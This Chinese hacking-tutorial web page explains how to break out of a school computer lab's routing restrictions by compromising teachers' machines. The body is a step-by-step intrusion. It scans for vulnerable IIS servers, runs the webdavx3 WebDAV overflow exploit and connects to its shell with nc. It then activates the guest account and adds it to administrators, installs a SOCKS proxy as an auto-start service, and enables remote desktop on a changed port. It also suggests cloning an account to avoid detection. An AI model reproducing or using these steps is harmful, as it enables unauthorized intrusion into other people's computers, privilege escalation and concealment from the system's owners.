设为首页
加入收藏
联系我们
电脑入门 | 操作系统 | 工具软件 | 病毒安全 | 平面设计 | 媒体动画 | 网页制作 | 网络编程 | 数 据 库 | 服 务 器 | 程序设计 
认证考试 | 网管大全 | 站长CLUB | 游戏娱乐 | 机械电子 | 学院热门 | 热门源码 | 软件新闻 | 驱动下载 
您当前的位置:藏经阁资源站 -> 病毒安全 -> 黑客攻防 -> 黑客入门 -> 教程内容 退出登录 用户管理
栏目导航
热门教程
· 劲舞团8K舞步 1.7最新舞步 魔神舞步
· [组图] 上网助手反间谍专家火热试用
· [组图] Win2000/XP/2003:系统万能Ghost全攻略
· [组图] Photoshop超酷海报效果
· [图文] 一分钟攻破ADSL 盗遍宽带密码1
· [组图] MATLAB 概 论
· AutoCAD二次开发语言及工具介绍
· [组图] Photoshop合成图:蛋壳-女孩
· [图文] 《仙剑奇侠传4》绝密情报 首度曝光
· [组图] 初学java常用开发工具介绍
· [图文] 将数码照片做成自动放映的Flash
· [图文] [常用]免费短信收发工具串串烧
· [图文] 《上古卷轴4》杂志扫描图抢先看
· 超全!Windows快捷键大全
· Pro/E 功能
· [组图] 用Pro/E画减速机渐开线斜齿圆柱齿轮的一般方法
· [组图] FLASH:《大话李白》创作全过程
· [组图] 使用Visual LISP创建简单的LISP应用程序
· 2004年计算机等级考试二级C语言试题及答案
· [图文] 信不信由你 KMPlayer隐藏着“雷电”
相关教程
· 宽带上网冲浪 应用技巧不可不看
· [图文] 让上网冲浪一劳永逸
突破路由限制随心所欲上网冲浪
作者:佚名  来源:不详  发布时间:2005-5-13 14:18:46  发布人:admin

减小字体 增大字体

我们学校那个机房联网方式是,教师和学生机分两个字网分别是192.168.0.0和192.168.18.0为了方便文件共享2个网络通过win2000的软路由连接.我们平时上机时老师就对win2000的软路由进行限制.丢弃所有学生子网访问外网的数据包,但2个子网之间可以正常访问说到这里聪明的朋友已经知道了怎么样突破了吧.对.只要我们访问外网的数据包都通过教师的机器转发,就可以解决问题了.因为路由认为我们是访问教师的机器,便让数据包通过而教师机再访问外网是不受限制的.原理并不难关键是怎么样在教师机器上装代理软件.总不能跑到教师办公室里和教师说吧!既然这样不行的话,我们就得用点非常规手段啦!由于现在webdavx溢出非常流行,所以我就用WebDAVScan对教
师子网全方位扫描,果然不出我的所料.发现了2台.
192.168.18.5 iis5.0 enable
192.168.18.18 iis5.0 enable
看来我的运气还是挺好的.接下来开始夺权吧
f:\>hacker\tools\webdavx3 192.168.18.5
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
waiting for iis restart.......................
try offset: 2
waiting for iis restart....................... (IIS reboot,just waiting...)
程序运行到这里停顿稍长时间,若停顿时间比较长而无反应,^C)
^C
f:\>hacker\tools\nc -vv 192.168.18.5 7788
进入目标机c:\winnt\system32
现在嘛,我是老大我怕谁!
c:\net user guest /active:yes
c:\net localgroup administrators guest /add
把guest用户激活并提升为管理员。
在自己的电脑上共享一个文件夹如 daili
c:\winnt\system32>copy \\192.168.0.10\daili\skserver.exe
已复制1个文件
c:\winnt\system32>copy \\192.168.0.10\daili\c3389.exe
已复制1个文件
c:\winnt\system32>copy \\192.168.0.10\daili\3389.exe
已复制1个文件
c:\winnt\system32>skserver -install (安装skserver)
Snake SockProxy Service installed.
c:\winnt\system32>skserver -config port 4000 把默认端口改成4000
The Port value have set to 4000
c:\winnt\system32>skserver -config starttype 2 把服务设定为自动启动
The New StartType have set to 2 -- Auto
c:\winnt\system32>net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功.
好了,现在代理服务安装完毕,我们可以把qq的sock5代理ip设为 192.168.0.5
端口为4000怎么样上去了吧。想看网页呀,点qq的浏览器呀!
如果出现超时的提示的话我们就要用到sockscap(代理帽子了)一路回车安装好
sockscap后填上你做的代理服务器ip地址和端口号并选者允许socks5代理,配置完毕
以后会出现一个主界面。把qq拖入空白框里就可以了!如IE之类不能拖入的可以
点击file-new-browse选者你要代理的软件就可以了。
如果你还想更多更方便的利用这个台机器的话我们就要用到我上传的3389.exe
和c3389.exe了
3389.exe就是开启3389终端服务的工具只要直接执行3389.exe 等主机重启后你
就可以用xp_ts连接上去了,
如果你等不急想立即重启的话只要在加个参数 /r就可以了!c3389是我们
用来改端口因为使用默认的3389端口的话容易被老师发现,而且还容易被同行
盗用。呵呵c3389的用法是直接打入c3389你要更改的端口号 回车就可以了 。
等机器重启后你就可以登陆了,不过用xp-ts连接的时候要用IP:端口来连接
否者无法登陆。比如我就要用192.168.18.5:5001来登陆。
为了不让老师发现你可以用ca或pus更改注册表克隆一个帐号具体方法就不细说了。 毕竟我现在可以上网了。
[] [返回上一页] [打 印] [收 藏]
上一篇教程:一个su后门程序
下一篇教程:用FTP获得密码
∷相关教程评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 
Copyright © 2000-2006 18839.Com. All Rights Reserved .
EMAIL:webmaster@18839.com 联系QQ:63191918 苏ICP备05065193号 带宽支持:三九互联